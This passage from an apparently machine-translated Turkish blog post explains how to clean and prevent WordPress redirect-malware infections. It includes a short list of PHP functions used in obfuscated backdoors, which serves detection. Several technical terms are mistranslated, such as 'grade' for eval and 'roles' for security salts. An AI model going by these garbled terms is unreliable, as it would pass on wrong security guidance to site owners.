Ayrıca, özellikle e-ticaret sitelerinde, önemli kullanıcı veya sipariş bilgilerini kaldırıp kaldırmadığınızı iki kez kontrol edin.

4. Arka kapıları kaldırın

Artık web sitenizi kötü amaçlı yazılımlardan temizlediğinize göre, arka kapıları kontrol edin. Bunlar, bir bilgisayar korsanının orijinal saldırıları keşfedilirse web sitenizi yeniden enfekte edebilmeleri için geride bıraktığı web sitenize giriş noktalarıdır.

Arka kapılar birkaç yerde olabilir. Aranacak bazı kodlar:

  • grade
  • base64_decode
  • gzinflate
  • preg_replace
  • str_rot13

Bir uyarı: Hepsi kötü değil. Bunlar, arka kapı işlevi görecek şekilde hafifçe değiştirilebilen meşru PHP betikleridir. Uygun analiz yapmadan çıkarma konusunda dikkatli olun.

5. Temizlenmiş dosyaları yeniden yükleyin

Saldırıyı kaldırdığınıza göre, sitenizi tekrar bir araya getirmeniz gerekiyor. Dosyaları yeniden yüklemek için bir dosya yöneticisi ve web sitenizi değiştirmek için cPanel veya VestaCP'de phpMyAdmin kullanın.

Bu, bir yedeği manuel olarak nasıl geri yüklediğinize çok benzer ve önce mevcut dosyaları ve veritabanını silmeniz gerektiği anlamına gelir. Başlangıçtaki yedekleme adımını yanlışlıkla atladıysanız, şimdi yapın. Saldırıya uğramış olsa bile web sitenizi yedeklemek, bir şeyler ters giderse sizi kederden kurtaracaktır.

6. Site önbelleğini temizle

Artık temizlenen web siteniz yüklendiğine göre, önbelleğinizi temizleyin. Önbellek, sayfalarınızın ve içeriğinizin önceki sürümlerini depolar ve bunları site ziyaretçilerinize gösterir. Yeni temizlenen sitenizin beklendiği gibi davranması için önbelleği temizlemeniz gerekir.

7. Eklentilerin ve temaların her birini kontrol edin

Kötü amaçlı yazılımla ilgili üzücü gerçek, neredeyse her yere gizlenebilmesidir. Tüm bu zaman ve enerjiyi web sitenizi manuel olarak temizlemek için harcadığınız için, çabalarınızın başarılı olduğundan emin olmak için fazladan birkaç dakika ayırmaya değer.

Web sitesi dosyalarını değiştirmek için çok çalışma gerektireceğinden, bunun için FTP kullanmanızı tavsiye ederim.

  • wp_contents klasörünü başka bir adla yeniden adlandırarak tüm eklentilerinizi ve temalarınızı devre dışı bırakın.
  • Ardından, sitenizi bir yönlendirme için her kontrol ettiğinizde bunları birer birer etkinleştirin.
  • Herhangi bir sorun yoksa, eklentilerin ve temaların kötü amaçlı yazılım içermediğini bilirsiniz.

Bilgisayar korsanı yönlendirmelerini manuel olarak kaldırmamanızı neden şiddetle tavsiye ediyorum?

Hack'leri bu şekilde silmeyi neden önermediğimi merak ediyor olabilirsiniz. Hack'leri, kanser veya kırık bir kemik gibi bir hastalığı düşündüğünüz gibi düşünün.

Bu hastalıkların bakımını, bu hastalıkların tedavisinde geniş deneyime sahip eğitimli profesyonel doktorlara bırakmayı tercih edersiniz. Eğitimsiz insanlar yarardan çok zarar verir. Kötü iyileşmiş bir kemik kırığıyla uğraşmak zorunda kalan herhangi bir doktora sorun.

Bir hack'i manuel olarak kaldırırken ters gidebilecek birkaç şey vardır:

  • Kötü amaçlı yazılımlar beklenmedik yerlere yayılabilir ve hatasız bir şekilde kaldırılması zordur.
  • Güvenlik açıkları ve/veya arka kapılar düzeltilmediyse kötü amaçlı yazılımları tek başına kaldırmak yeterli değildir.
  • Beceriksiz silme bazen web sitesinin diğer bölümlerini bozabilir.
  • Büyük sitelerde (ör. e-ticaret mağazaları) manuel olarak geçiş yapmak çok zor ve zaman alıcı olacaktır.
  • Hack'ler zamanla katlanarak kötüleştiğinden, zaman çok önemlidir.
  • Barındırıcı hesabınızı yasakladıysa web sitenize erişemeyebilir

Basitçe söylemek gerekirse, saldırıya uğramış bir web sitesinde büyük bir hata payı vardır. Bu süreçten başladığınızdan daha kötü bir durumda çıkmak gibi çok gerçek bir tehlike var. Bilgisayar korsanı komut dosyalarını kaldırmak için iyi bir güvenlik eklentisi kullanmak en iyisidir.

Web sitesi istenmeyen postaya yönlendiriliyor: Bu, web sitemi nasıl etkiledi?

Web siteleri karmaşık yazılım karışımlarıdır ve özünde 100%'de hiçbir yazılım hacklenemez. Bu, geçmişin 8 bitlik oyunlarından bankalar tarafından kullanılan devasa yönetim bilgi sistemlerine kadar tüm yazılımların gerçeğidir.

WordPress web siteleri farklı değil. WordPress çekirdek dosyaları kurşun geçirmez olmaya en yakınken, eklentiler ve temalar için aynı şey söylenemez. Eklentiler ve temalar, web sitelerine dinamik öğeler, işlevsellik ve tasarım ekler ve bunlar olmadan bir site hem güvenli hem de statik ve sıkıcı olur.

İşte WordPress sitelerinin saldırıya uğramasının nedenlerinin bir listesi:

  1. Eklenti ve temalardaki güvenlik açıkları;
  2. Hatalı parolalar ve güvenliği ihlal edilmiş kullanıcı hesapları;
  3. Sıfırlanan temalarda ve eklentilerde arka kapılar;
  4. XSS komut dosyası saldırıları;
  5. Botlarla kaba kuvvet saldırıları.

Daha önce belirtildiği gibi, web sitesi güvenliği hafife alınmamalıdır. Artık bir hack'i düzeltmenin ne kadar zor olduğuna dair ilk elden deneyime sahipsiniz, bu yüzden ideal olarak bunun tekrarlanmamasını sağlayacak bir stratejiniz olmalıdır.

Gelecekte WordPress Yönlendirme saldırıları nasıl önlenir?

Artık temiz bir web siteniz olduğuna göre, sonraki adımlar WordPress web sitenizin spam'e yönlendirilmesini önlemektir.

Hack'ler her zaman tekrarlanır. Bunun başlıca nedeni, sitenizin saldırıya uğrama nedeninin giderilmemiş olmasıdır. Bir nüksetmeyi önlemek için aşağıdaki adımlar atılmalıdır:

1. Güvenlik eklentisini kurun: tarayabilen, temizleyebilen ve saldırıları önleyebilen iyi bir güvenlik eklentisi seçin. Bu eklentiler, zararlı trafiğin sitenize ulaşmasını proaktif olarak engelleyen yerleşik bir güvenlik duvarına sahiptir.
2. Kullanıcılar ve veritabanı için tüm parolaları değiştirin: Güvenliği ihlal edilmiş kullanıcı hesapları ve kolayca tahmin edilebilen şifreler, web sitesi saldırılarının ikinci nedenidir.
3. Kullanıcı hesaplarını sıfırlayın ve kontrol edin: Gereksiz yönetici erişimi olan kullanıcı hesaplarını kontrol edin ve kaldırın.
4. Rolleri + Güvenlik Anahtarlarını Değiştir: roller ve güvenlik anahtarları, WordPress'in kullanıcıların güvenli bir şekilde oturum açmasına yardımcı olmak için çerez oturum açma verilerine iliştirdiği uzun dizelerdir. Yenilerini almak için WordPress oluşturucuyu kullandıktan sonra bunları wp-config.php dosyanızda değiştirebilirsiniz.
5. Yalnızca kanıtlanmış eklentileri ve temaları kullandığınızdan emin olun.: Bunu daha önce söyledim ama tekrar etmekte fayda var. Yalnızca güvenilir geliştiricilerin eklentilerini ve temalarını kullanın. Bu geliştiriciler, güvenlik için inanılmaz derecede önemli olan destek ve güncellemeler sağlayacaktır. Hiçbir koşulda boş temalar ve eklentiler kullanmamalısınız. Neyi kurtarırsan kurtar, kaçınılmaz hack nedeniyle defalarca kaybedeceksin.
6. SSL'ye sahip olduğunuzdan emin olunY: İdeal olarak, web sitenizde zaten SSL olması gerekir, ancak eksiksizlik adına bunu dahil ediyoruz. SSL, web sitesine giden ve siteden gelen iletişimin şifreli olmasını sağlar. Google ayrıca bu değişikliği çok zorluyor ve web sitenizde SSL etkin değilse, yakında SEO cezaları görmeye başlayacaksınız.
7. WordPress'i koruyun: Yaygın olarak WordPress'i güçlendirme olarak bilinen güvenlik sıkılaştırma önlemleri vardır. İnternette bulunan harika ipuçlarını takip etmeyi unutmamanız konusunda sizi uyarmak isterim. Bazıları tamamen çalışmıyor ve sitenizi ve ziyaretçi deneyiminizi etkileyecek.
8. Düzenli olarak yapılacak bir güvenlik planına/eylemlerine sahip olun: Bir şeyi sadece bir kez yapıp unutmak yeterli değildir. En azından, kullanıcıları düzenli olarak kontrol edin ve şifre sıfırlamalarını zorunlu kılın. Bir etkinlik günlüğü ayarlamak da iyi bir fikirdir çünkü bu, genellikle saldırıya uğramış bir sitenin erken uyarı işareti olabilen kullanıcı etkinliğini izlemeyi kolay ve hızlı hale getirir.
9. Ayrıca her şeyi güncellemeniz gerekiyor.A: WordPress, eklentiler ve temalar ve düzenli yedeklemeler yapın.

Kötü amaçlı yönlendirmelerin sonuçları nelerdir?

Herhangi bir saldırının bir web sitesi üzerinde korkunç bir etkisi vardır ve WordPress yönlendirme kötü amaçlı yazılımı da farklı değildir. Kötü amaçlı yazılımların web sitenizi ve işinizi olumsuz etkileme yollarından yalnızca birkaçı:

  • Gelir kaybıe-ticaret siteniz veya iş siteniz varsa.
  • marka değeri kaybı ziyaretçileri yasa dışı, hileli veya spam sitelere yönlendirme nedeniyle.
  • SEO Üzerindeki Etkisiçünkü Google, saldırıya uğramış siteleri listelerinde cezalandırır ve saldırıya uğramış bir siteyi işaretler, böylece ziyaretçiler genellikle siteyi ziyaret etmekten korkar.
  • Veri ihlali ziyaretçileriniz ve siteniz.

Bilgisayar korsanlığının mülk hasarına neden olabileceği daha birçok yol vardır. Kritik faktör, hızlı hareket etmek ve kötü amaçlı yazılımdan mümkün olan en kısa sürede kurtulmaktır.

Çıktı

WordPress yönlendirme korsanlığı kötü amaçlı yazılımı zaman zaman yeni bir avatarda görünür. Bilgisayar korsanları ve dolayısıyla kötü amaçlı yazılımları giderek daha akıllı hale geliyor. WordPress web siteleri onlar için bir hazinedir ve onları yenmenin tek yolu oyunlarının önüne geçmektir.

WordPress web sitenizi güvenli hale getirmenin en iyi yolu, yerleşik bir güvenlik duvarı ile birlikte gelen iyi bir güvenlik eklentisi kurmaktır. Bu, şüphesiz web sitenizin güvenliğine yapılan en iyi yatırımdır.

Bu makaleyi okumak:

Okuduğunuz için teşekkürler: SEO YARDIMI | NICOLA.ÜST

Bu gönderi ne kadar yararlı oldu?

Derecelendirmek için bir yıldıza tıklayın!

Ortalama puanı 5 / 5. Oy sayısı: 543

Şimdiye kadar oy yok! Bu gönderiyi ilk değerlendiren siz olun.

Şunlar da hoşunuza gidebilir...

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

on − 4 =